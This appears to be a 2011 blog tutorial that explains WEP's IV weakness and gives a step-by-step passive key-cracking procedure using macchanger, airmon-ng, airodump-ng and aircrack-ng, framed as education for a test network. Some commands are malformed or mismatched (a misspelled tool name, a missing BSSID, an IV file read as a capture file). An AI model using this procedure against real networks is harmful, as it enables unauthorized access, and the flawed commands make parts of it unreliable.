Wednesday, January 26, 2011

802.11 WEP Wireless Hacking

Introduction to WEP and the IV vulnerability

Wired Equivalent Privacy (WEP) is a wireless security protocol, providing both encryption and authentication.

The encryption method used is RSA's RC4 stream cipher. The RC4 algorithm operates on a 'seed' consisting of an initialization vector (IV) and a secret shared key to create a keystream which is XORed with plaintext to create ciphertext.

When connecting to a WEP secured network you are asked for the secret shared key which is used to authenticate clients to the network and also encrypt the traffic.

The vulnerability in the WEP protocol is the transit of the IV in plaintext. This allows an attacker to eavesdrop on wireless traffic and collect enough IVs to bruteforce the secret shared authentication key. Once the key is obtained the attacker uses it to connect to the target wireless network.
Note: A standard WEP implementation uses a 40 bit key and a 24 bit IV, resulting in a 64 bit keystream. Because of this, WEP is sometimes referred to as 40 bit WEP or 64 bit WEP.

Cracking a WEP Key

The purpose of this article is for education and security auditing only. Anyone using this for any other reason are liable for their own actions. 

To see this vulnerability work and to actually crack a WEP key in a test environment you need some tools.
  • A test network using an 802.11 wireless router with WEP enabled and a 40 bit key created. 
  • A linux machine with a wireless card. In this example Back Track 4 r2 is the operating system used. Download a live DVD if you don't have a dedicated machine.
  • macchanger, airmon-ng, airdump-ng, and aircrack-ng. These tools are all included in Back Track 4. 

    The following example is a passive WEP attack that observes traffic and collects IVs. In comparison, an active attack involves packet injection to get the access point (AP) to generate more traffic and in turn more IVs; resulting in a faster crack. The passive attack takes significantly longer depending on the traffic volume on the target network. 

    Assuming the wireless interface is wlan0, disable the interface. 
    ifconfig wlan0 down

    Use macchanger to change the MAC address of the wlan0 interface. 
    macchanger --mac 00:11:22:33:44:55 wlan0

    Bring the wlan0 interface back up.
    ifconfig wlan0 up

    Use airmon to create a monitor mode interface for wlan0. The new monitoring interface is called mon0.
    airmon-ng start wlan0

    Run airodump to observe target networks and gather MAC (BSSID), channel and ESSID.
    airodump-ng mon0

    Run airodump again this time specifying the target channel, BSSID, and file to dump the output to. This step is where the IVs are collected for analysis later. Again, since this is a passive attack it may take a while to collect enough IVs. Leave the machine on overnight collecting data if needed.

    airodump-ng --ivs -w /root/dumpfile --bssid mon0

    Keep an eye on the above command. One column is called #Data. This is the actual number of IVs collected from the network. If there is no traffic on the network this number will slowly increase. Once you have about 20,000 IVs, run the following command.
    aircrack-ng /root/dumpfile.cap

    aircrack will report back if it has successfully cracked the WEP key or if you need to continue to collect more IVs and try again. The number of IVs needed to crack a key varies, but it can be done in less than 20,000 IVs.